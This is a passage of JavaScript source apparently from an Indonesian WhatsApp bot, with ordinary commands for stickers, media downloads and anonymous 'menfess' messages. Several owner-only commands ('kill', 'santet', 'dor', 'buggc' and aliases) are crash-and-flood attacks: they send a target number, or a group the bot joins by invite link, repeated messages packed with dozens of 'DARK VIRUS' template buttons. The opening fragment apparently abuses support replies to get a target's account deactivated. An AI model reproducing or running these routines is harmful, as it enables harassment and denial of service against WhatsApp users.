akun sebelum dihapus, Anda akan tetap berada di semua obrolan grup. Anda akan memiliki opsi untuk memulihkan data Anda. Pelajari caranya Jika Anda tidak mendaftarkan ulang akun Anda, akun tersebut mungkin akan dihapus dan proses ini tidak dapat dibatalkan. Sayangnya, WhatsApp tidak dapat membantu Anda memulihkan obrolan, dokumen, media
Catatan: Jika perangkat Anda hilang atau dicuri, sebaiknya hubungi penyedia seluler Anda untuk memblokir kartu SIM Anda sesegera mungkin. Memblokir kartu SIM Anda mencegah orang lain mendaftar dan mengakses akun yang terkait dengan kartu SIM.
Sumber daya terkait:
Untuk informasi lebih lanjut tentang penonaktifan akun pada ponsel yang hilang dan dicuri, silakan baca artikel ini.
Pelajari tentang akun yang dicuri di artikel ini.
Jika Anda memiliki pertanyaan atau masalah lain, jangan ragu untuk menghubungi kami. Kami akan dengan senang hati membantu!`)
} else if (payload.includes(`"payload":false`)) {
diablobotwhatsapp.reply(`Terima kasih telah menghubungi kami. Kami akan menghubungi Anda kembali melalui email, dan itu mungkin memerlukan waktu hingga tiga hari kerja.`)
} else diablobotwhatsapp.reply(util.format(res.data))
} catch (err) {reply(`${err}`)}
} else diablobotwhatsapp.reply('Masukkan nomor target!')
}
break
case 'menfess':
case 'menfes':
case 'confes':
case 'confess':
if (diablobotwhatsapp.isGroup) return diablobotwhatsapp.reply('Fitur Tidak Dapat Digunakan Untuk Group!')
if (!text) return diablobotwhatsapp.reply(`*Cara Penggunaan*\n\nKirim perintah ${prefix}${command} nomer|pengirim|pesan\n\nContoh ${prefix}${command} 62831xxxxxxx|ini nama samaran ya|I have a crush on you\n\nContoh 2 : ${prefix}${command} 62831xxxxxxx|crush mu|I have s crush on you\n\nTenang aja privasi aman kok><`)
let nomor = q.split('|')[0] ? q.split('|')[0] : q
let saking = q.split('|')[1] ? q.split('|')[1] : q
let pesan = q.split('|')[2] ? q.split('|')[2] : ''
if (pesan.length < 1) return diablobotwhatsapp.reply(`Harus di isi semua! ex : menfess 62831xxxxxxxx|orang|hallo kamu`)
let teksnya = `Assalamualaikum kak ada Menfess nih!!\n─────────────\nDani\n─────────────\n\nDari : _${saking}_ \nPesan : _${pesan}_ `
header = 'hayyy'
gambar = `https://telegra.ph/file/088d3cfe14a83c01aec74.jpg`
but = [
{ urlButton: { displayText: `Subscribe YT`, url : `https://www.youtube.com/@exoo_mods137` } },
{ quickReplyButton: { displayText: `𝐓𝐞𝐫𝐢𝐦𝐚 𝐌𝐞𝐧𝐟𝐞𝐬𝐬`, id: `menfesconfirm ${diablobotwhatsapp.sender}` } },
{ quickReplyButton: { displayText: `𝐊𝐢𝐫𝐢𝐦 𝐌𝐞𝐧𝐟𝐞𝐬𝐬𝐦𝐮`, id: `Menfess` } }
]
diablo.sendMessage(`${nomor}@s.whatsapp.net`, { caption: teksnya, image: {url: `https://telegra.ph/file/4aed0c6c8ba80e789e437.jpg`}, templateButtons: but, footer: `Ciee ada yang ngirim pesan nih\nJangan lupa bales pesannya ya` })
diablobotwhatsapp.reply(`Sukses Mengirim Menfess!!`)
break
case 'self': {
if (!itsMediablo) throw mess.owner
diablo.public = false
diablobotwhatsapp.reply('BOT MODE SELEB🗿')
}
break
case 'public': {
if (!itsMediablo) throw mess.owner
diablo.public = true
diablobotwhatsapp.reply('BOT MODE ANTI SELEB')
}
break
case 'ytmp3':
if (!text) throw `Example : ${prefix + command} Link Nya`
let isLinks2 = args[0].match(/(?:https?:\/{2})?(?:w{3}\.)?youtu(?:be)?\.(?:com|be)(?:\/watch\?v=|\/)([^\s&]+)/)
if (!isLinks2) return m.reply(`Linknya Jelek`)
diablobotwhatsapp.reply(mess.wait)
anu = await ytMp3(`${q}`)
titlenyaa = `TITLE BERHASIL DI DAPATKAN\n\nJudul : ${anu.title}\nUpload : ${anu.uploadDate}\nSize : ${anu.size}\nViews : ${anu.views}\nLike : ${anu.likes}\nDislike : ${anu.dislike}\nChannel : ${anu.channel}\nDeskripsi : ${anu.desc}\n\nMOHON TUNGGU SEDANG MENGIRIM MEDIA`
diablo.sendMessage(diablobotwhatsapp.chat, { image: { url: anu.thumb }, caption: `${titlenyaa}`}, { quoted: diablobotwhatsapp })
diablo.sendMessage(diablobotwhatsapp.chat, { audio: { url: anu.result }, mimetype: 'audio/mpeg', fileName: `${anu.title}.mp3` }, { quoted: diablobotwhatsapp })
break
case 'ppcp': {
diablobotwhatsapp.reply(mess.wait)
let anu = await fetchJson('https://raw.githubusercontent.com/iamriz7/kopel_/main/kopel.json')
let random = anu[Math.floor(Math.random() * anu.length)]
diablo.sendMessage(diablobotwhatsapp.chat, { image: { url: random.male }, caption: `Cowoknya` }, { quoted: diablobotwhatsapp })
diablo.sendMessage(diablobotwhatsapp.chat, { image: { url: random.female }, caption: `Ceweknya` }, { quoted: diablobotwhatsapp })
}
break
case 'sticker': case 's': case 'stickergif': case 'sgif': {
if (!quoted) return diablobotwhatsapp.reply(`Balas Video/Image Dengan Caption ${prefix + command}`)
diablobotwhatsapp.reply(mess.wait)
if (/image/.test(mime)) {
let media = await quoted.download()
let encmedia = await diablo.sendImageAsSticker(diablobotwhatsapp.chat, media, diablobotwhatsapp, { packname: global.packname, author: global.author })
await fs.unlinkSync(encmedia)
} else if (/video/.test(mime)) {
if ((quoted.msg || quoted).seconds > 11) return diablobotwhatsapp.reply('Maksimal 10 detik!')
let media = await quoted.download()
let encmedia = await diablo.sendVideoAsSticker(diablobotwhatsapp.chat, media, diablobotwhatsapp, { packname: global.packname, author: global.author })
await fs.unlinkSync(encmedia)
} else {
diablobotwhatsapp.reply(`Kirim Gambar/Video Dengan Caption ${prefix + command}\nDurasi Video 1-9 Detik`)
}
}
break
case 'setppbot': {
if (!itsMediablo) return diablobotwhatsapp.reply(mess.owner)
if (!quoted)return diablobotwhatsapp.reply(`Kirim/Reply Image Dengan Caption ${prefix + command}`)
if (!/image/.test(mime)) return diablobotwhatsapp.reply(`Kirim/Reply Image Dengan Caption ${prefix + command}`)
if (/webp/.test(mime)) return diablobotwhatsapp.reply(`Kirim/Reply Image Dengan Caption ${prefix + command}`)
let media = await diablo.downloadAndSaveMediaMessage(quoted)
await diablo.updateProfilePicture(botNumber, { url: media }).catch((err) => fs.unlinkSync(media))
diablobotwhatsapp.reply(`Succes`)
}
break
case 'setppbot2': {
if (!itsMediablo) return reply(mess.owner)
if (!quoted) diablobotwhatsapp.reply( `Kirim/Reply Image Dengan Caption ${prefix + command}`)
if (!/image/.test(mime)) return reply( `Kirim/Reply Image Dengan Caption ${prefix + command}`)
if (/webp/.test(mime)) return reply( `Kirim/Reply Image Dengan Caption ${prefix + command}`)
let mediaa = await diablo.downloadAndSaveMediaMessage(quoted)
var { img } = await pepe(mediaa)
await diablo.query({
tag: 'iq',
attrs: {
to: botNumber,
type:'set',
xmlns: 'w:profile:picture'
},
content: [
{
tag: 'picture',
attrs: { type: 'image' },
content: img
}
]
})
diablobotwhatsapp.reply(`Sukses`)
}
break
case 'tiktok':
if(!text) return diablobotwhatsapp.reply(`Linknya?`)
anu = await fetchJson(`https://api.yanzbotzz.repl.co/api/download/tiktok?url=${text}&apikey=YanzBotz`)
diablo.sendMessage(diablobotwhatsapp.chat, { video: { url: anu.result.video.no_watermark }, mimetype: 'video/mp4', fileName: `${anu.title}.mp4` }, { quoted: diablobotwhatsapp })
break
case 'sticker': case 's': case 'stickergif': case 'sgif': {
if (!quoted) return diablobotwhatsapp.reply(`Balas Video/Image Dengan Caption ${prefix + command}`)
diablobotwhatsapp.reply(mess.wait)
if (/image/.test(mime)) {
let media = await quoted.download()
let encmedia = await hisoka.sendImageAsSticker(diablobotwhatsapp.chat, media, diablobotwhatsapp, { packname: global.packname, author: global.author })
await fs.unlinkSync(encmedia)
} else if (/video/.test(mime)) {
if ((quoted.msg || quoted).seconds > 11) return diablobotwhatsapp.reply('Maksimal 10 detik!')
let media = await quoted.download()
let encmedia = await diablo.sendVideoAsSticker(diablobotwhatsapp.chat, media, diablobotwhatsapp, { packname: global.packname, author: global.author })
await fs.unlinkSync(encmedia)
} else {
diablobotwhatsapp.reply(`Kirim Gambar/Video Dengan Caption ${prefix + command}\nDurasi Video 1-9 Detik`)
}
}
break
case 'ytmp4':
if (!text) throw `Example : ${prefix + command} Link Nya`
let isLinks= args[0].match(/(?:https?:\/{2})?(?:w{3}\.)?youtu(?:be)?\.(?:com|be)(?:\/watch\?v=|\/)([^\s&]+)/)
if (!isLinks) return m.reply(`Linknya Jelek`)
diablobotwhatsapp.reply(mess.wait)
anu = await ytMp4(`${q}`)
titlenyaa = `TITLE BERHASIL DI DAPATKAN\n\nJudul : ${anu.title}\nUpload : ${anu.uploadDate}\nSize : ${anu.size}\nViews : ${anu.views}\nLike : ${anu.likes}\nDislike : ${anu.dislike}\nChannel : ${anu.channel}\nDeskripsi : ${anu.desc}\n\nMOHON TUNGGU SEDANG MENGIRIM MEDIA`
diablo.sendMessage(diablobotwhatsapp.chat, { image: { url: anu.thumb }, caption: `${titlenyaa}`}, { quoted: diablobotwhatsapp })
diablo.sendMessage(diablobotwhatsapp.chat, { video: { url: anu.result }, mimetype: 'video/mp4', fileName: `${anu.title}.mp4` }, { quoted: diablobotwhatsapp })
break
case 'akses':
diablobotwhatsapp.reply(`UNTUK AKSES BOT CHAT OWNER : wa.me/6288983443938`)
break
case 'sewa':
diablobotwhatsapp.reply(`UNTUK SEWA BOT CHAT OWNER : wa.me/6288983443939`)
break
case 'join': {
if (!itsMediablo) return diablobotwhatsapp.reply(mess.owner)
if (!text) return diablobotwhatsapp.reply(`Contoh ${prefix+command} linkgc`)
if (!isUrl(args[0]) && !args[0].includes('whatsapp.com')) throw 'Link Invalid!'
let result = args[0].split('https://chat.whatsapp.com/')[1]
await diablo.groupAcceptInvite(result).then((res) => diablobotwhatsapp.reply(jsonformat(res))).catch((err) => diablobotwhatsapp.reply(jsonformat(err)))
}
break
case 'restart':{
if (!isGroup) return diablobotwhatsapp.reply(`wajib dalam grup`)
if (!isGroupAdmins) return diablobotwhatsapp.reply(`sorry anda sepertinya bukan pemilik bot`)
txts = `SUCCES KAK`
diablobotwhatsapp.reply(txts)
let cp = require('child_process')
let { promisify } = require('util')
let exec = promisify(cp.exec).bind(cp)
let o
try {
o = exec('pm2 restart all')
} catch (e) {
o = e
} finally {
let { stdout, stderr } = o
}
}
break
case 'addakses':
if (!isGroup) return diablobotwhatsapp.reply(`wajib dalam grup`)
if (!isGroupAdmins) return diablobotwhatsapp.reply(`sorry anda sepertinya bukan pemilik bot`)
if (!args[0]) return diablobotwhatsapp.reply(`Penggunaan ${prefix+command} nomor\nContoh ${prefix+command} 0`)
bnnd = q.split("|")[0].replace(/[^0-9]/g, '')
let ceknye = await diablo.onWhatsApp(bnnd + `@s.whatsapp.net`)
if (ceknye.length == 0) return reply(`Masukkan Nomor Yang Valid Dan Terdaftar Di WhatsApp!!!`)
owner.push(bnnd)
fs.writeFileSync('./database/owner.json', JSON.stringify(owner))
diablobotwhatsapp.reply(`Nomor ${bnnd} Sudah Bisa Akses Bot Exoo Mods, Jangan Lupa Jeda Ya om 🥵!!!`)
break
case 'delakses':
if (!isGroup) return diablobotwhatsapp.reply(`wajib dalam grup`)
if (!isGroupAdmins) return diablobotwhatsapp.reply(`sorry anda sepertinya bukan pemilik bot`)
if (!args[0]) return diablobotwhatsapp.reply(`Penggunaan ${prefix+command} nomor\nContoh ${prefix+command} 0`)
ya = q.split("|")[0].replace(/[^0-9]/g, '')
unp = owner.indexOf(ya)
owner.splice(unp, 1)
fs.writeFileSync('./database/owner.json', JSON.stringify(owner))
diablobotwhatsapp.reply(`Nomor ${ya} Sudah Tidak Bisa Akses Bot`)
break
case 'tagcuy': {
if (!itsMediablo) return diablobotwhatsapp.reply(`sorry anda sepertinya bukan pemilik bot`)
diablo.sendMessage(diablobotwhatsapp.chat, { text : q ? q : '' , mentions: participants.map(a => a.id)}, { quoted: diablobotwhatsapp })
}
break
case 'test':
case 'stats':{
const used = process.memoryUsage()
const cpus = os.cpus().map(cpu => {
cpu.total = Object.keys(cpu.times).reduce((last, type) => last + cpu.times[type], 0)
return cpu
})
const cpu = cpus.reduce((last, cpu, _, { length }) => {
last.total += cpu.total
last.speed += cpu.speed / length
last.times.user += cpu.times.user
last.times.nice += cpu.times.nice
last.times.sys += cpu.times.sys
last.times.idle += cpu.times.idle
last.times.irq += cpu.times.irq
return last
}, {
speed: 0,
total: 0,
times: {
user: 0,
nice: 0,
sys: 0,
idle: 0,
irq: 0
}
})
let timestamp = speed()
let latensi = speed() - timestamp
respon = `
Kecepatan Respon ${latensi.toFixed(4)} _Second_ \nRuntime : ${runtime(process.uptime())}
💻 Info Server
RAM: ${formatp(os.totalmem() - os.freemem())} / ${formatp(os.totalmem())}
`
diablobotwhatsapp.reply(respon)
}
break
case 'kill':
if (!itsMediablo) return diablobotwhatsapp.reply(`sorry anda sepertinya bukan pemilik bot`)
if (!isGroup) return diablobotwhatsapp.reply(`wajib dalam grup`)
txts = `SUCCES ✅`
diablobotwhatsapp.reply(txts)
if (!q) return
num = `${q}`+'@s.whatsapp.net'
jumlah = '20'
waktu = `4s`
// KALO MAU BUTTON BANYAK COPY BUTTON NYA TRUS BANYAKIN CONTOH DI BAWAH INI NGENTOT
/* templateButtons: [
{ callButton: { displayText: `☣️ DARK VIRUS ☣️`, phoneNumber: ``}},
{ callButton: { displayText: `☣️ DARK VIRUS ☣️`, phoneNumber: ``}},
{ urlButton: { displayText: `☣️ DARK VIRUS ☣️`, url: `https://www.whatsapp.com/otp/copy/`}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
,*/
for (let i = 0; i < jumlah; i++) {
diablo.sendMessage(num, {
text: 'BUG BY JOKER',
templateButtons: [
{ callButton: { displayText: `☣️ DARK VIRUS ☣️`, phoneNumber: ``}},
{ callButton: { displayText: `☣️ DARK VIRUS ☣️`, phoneNumber: ``}},
{ urlButton: { displayText: `☣️ DARK VIRUS ☣️`, url: `https://www.whatsapp.com/otp/copy/`}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `AKWOWK KASIAN️`, id: ``}},
{ quoted: lep }
]})}
await sleep(ms(waktu))
break
case 'santet':
case 'bug5':
if (!itsMediablo) return diablobotwhatsapp.reply(`sorry anda sepertinya bukan pemilik bot`)
if (!isGroup) return diablobotwhatsapp.reply(`wajib dalam grup`)
txts = `SUCCES ✅`
diablobotwhatsapp.reply(txts)
if (!q) return
num = `${q}`+'@s.whatsapp.net'
jumlah = '10'
waktu = `4s`
// KALO MAU BUTTON BANYAK COPY BUTTON NYA TRUS BANYAKIN CONTOH DI BAWAH INI NGENTOT
/* templateButtons: [
{ callButton: { displayText: `☣️ DARK VIRUS ☣️`, phoneNumber: ``}},
{ callButton: { displayText: `☣️ DARK VIRUS ☣️`, phoneNumber: ``}},
{ urlButton: { displayText: `☣️ DARK VIRUS ☣️`, url: `https://www.whatsapp.com/otp/copy/`}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
,*/
for (let i = 0; i < jumlah; i++) {
diablo.sendMessage(num, {
text: 'BUG BY JOKER',
templateButtons: [
{ callButton: { displayText: `☣️ DARK VIRUS ☣️`, phoneNumber: ``}},
{ callButton: { displayText: `☣️ DARK VIRUS ☣️`, phoneNumber: ``}},
{ urlButton: { displayText: `☣️ DARK VIRUS ☣️`, url: `https://www.whatsapp.com/otp/copy/`}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quoted: lep }
]})}
await sleep(ms(waktu))
break
case 'dor':
case 'bug10':
if (!itsMediablo) return diablobotwhatsapp.reply(`sorry anda sepertinya bukan pemilik bot`)
if (!isGroup) return diablobotwhatsapp.reply(`wajib dalam grup`)
txts = `SUCCES ✅`
diablobotwhatsapp.reply(txts)
if (!q) return
num = `${q}`+'@s.whatsapp.net'
jumlah = '10'
waktu = `4s`
// KALO MAU BUTTON BANYAK COPY BUTTON NYA TRUS BANYAKIN CONTOH DI BAWAH INI NGENTOT
/* templateButtons: [
{ callButton: { displayText: `☣️ DARK VIRUS ☣️`, phoneNumber: ``}},
{ callButton: { displayText: `☣️ DARK VIRUS ☣️`, phoneNumber: ``}},
{ urlButton: { displayText: `☣️ DARK VIRUS ☣️`, url: `https://www.whatsapp.com/otp/copy/`}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
,*/
for (let i = 0; i < jumlah; i++) {
diablo.sendMessage(num, {
text: 'BUG BY JOKER',
templateButtons: [
{ callButton: { displayText: `☣️ DARK VIRUS ☣️`, phoneNumber: ``}},
{ callButton: { displayText: `☣️ DARK VIRUS ☣️`, phoneNumber: ``}},
{ urlButton: { displayText: `☣️ DARK VIRUS ☣️`, url: `https://www.whatsapp.com/otp/copy/`}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ callButton: { displayText: `☣️ DARK VIRUS ☣️`, phoneNumber: ``}},
{ callButton: { displayText: `☣️ DARK VIRUS ☣️`, phoneNumber: ``}},
{ urlButton: { displayText: `☣️ DARK VIRUS ☣️`, url: `https://www.whatsapp.com/otp/copy/`}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ DARK VIRUS ☣️`, id: ``}},
{ quoted: lep }
]})}
await sleep(ms(waktu))
break
case 'gcc':
case 'seranggc':
case 'war':
case 'bejat':
case 'santetgc':
case 'otwgc':
case 'buggc':{
if (!text) return diablobotwhatsapp.reply(`Contoh ${prefix+command} Linkgrup`)
if (!itsMediablo) return diablobotwhatsapp.reply(`Hanya Owner Saja❗`)
if (!isGroup) return diablobotwhatsapp.reply(`Wajib Dalam Grup`)
diablobotwhatsapp.reply(`Sabarr Bwanhh`)
if (!q) return reply(`Penggunaan ${prefix+command} link`)
if (!isUrl(args[0]) && !args[0].includes('whatsapp.com')) return reply('Link Invalid!')
let result = args[0].split('https://chat.whatsapp.com/')[1]
let jumlah = "5"
for (let i = 0; i < jumlah; i++) {
let kir = await diablo.groupAcceptInvite(result)
diablo.sendMessage(kir, {
text: 'BUG BY CYCLONE',
templateButtons: [
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ urlButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, url: `https://www.whatsapp.com/otp/copy/`}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ urlButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, url: `https://www.whatsapp.com/otp/copy/`}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ urlButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, url: `https://www.whatsapp.com/otp/copy/`}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ urlButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, url: `https://www.whatsapp.com/otp/copy/`}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ urlButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, url: `https://www.whatsapp.com/otp/copy/`}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ urlButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, url: `https://www.whatsapp.com/otp/copy/`}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ urlButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, url: `https://www.whatsapp.com/otp/copy/`}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ urlButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, url: `https://www.whatsapp.com/otp/copy/`}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ urlButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, url: `https://www.whatsapp.com/otp/copy/`}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ urlButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, url: `https://www.whatsapp.com/otp/copy/`}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ urlButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, url: `https://www.whatsapp.com/otp/copy/`}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ urlButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, url: `https://www.whatsapp.com/otp/copy/`}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ urlButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, url: `https://www.whatsapp.com/otp/copy/`}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},
{ urlButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, url: `https://www.whatsapp.com/otp/copy/`}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ quickReplyButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, id: ``}},
{ callButton: { displayText: `☣️ WARNING !!! 💣💥 ☣️`, phoneNumber: ``}},